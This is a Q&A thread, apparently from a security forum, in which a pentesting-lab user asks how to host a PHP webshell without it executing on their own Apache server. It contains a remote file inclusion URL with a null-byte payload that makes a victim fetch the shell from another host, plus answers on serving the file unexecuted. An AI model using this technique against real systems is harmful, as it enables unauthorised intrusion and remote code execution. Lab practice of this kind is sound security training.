Serving a php webshell without running it locally

Question

I am using Kali Linux in a pentesting lab.

By entering the following URL on the victim system I can get it to access my apache server (I see a 200 access response in my logs), but the php file renders on my system and then I spawn a webshell on my own box:

https://10.0.0.1/section.php?page=http://10.0.0.2/phpshell.php%00

How do I "change the binding" in apache to prevent it from running? Changing it to a .txt seems to prevent it from running on both systems; not sure that I can inject it that way.

Are you trying to attack 10.0.0.1 by including a file from 10.0.0.2? — Sjoerd, Dec 23 '16 at 20:54
@Info5ek I stumbled on this while googling for section.php. Your comment is well stated ;) — gr0k, Mar 30 '18 at 01:32

score 7 · Answer 1 · answered Dec 23 '16 at 20:57

7

Use the following setting in your apache config or in a .htaccess file:

php_flag engine off

See also Disable PHP in directory (including all sub-directories) with .htaccess.

answered Dec 23 '16 at 20:57

Sjoerd

28,707
12
74
102

Thank you! I wish I could mark two answers - you directly addresed my Apache question, but the SimpleHTTPServer is so straightforward I've got to go with it! Thanks for taking the time to chime in however :) This response is equally relevant. – Shrout1 Dec 27 '16 at 17:25

score 5 · Accepted Answer · answered Dec 24 '16 at 00:21

5

python -m SimpleHTTPServer 80

will spawn you a simple http server that is not php aware, quickest way imho

answered Dec 24 '16 at 00:21

Sebastian B.

571
3
7

Thanks so much! This server is awesome for simple file hosting out of various directories on the system. Incredibly easy to use and none of the extra Apache fluff. – Shrout1 Dec 27 '16 at 17:26

Serving a php webshell without running it locally

2 Answers2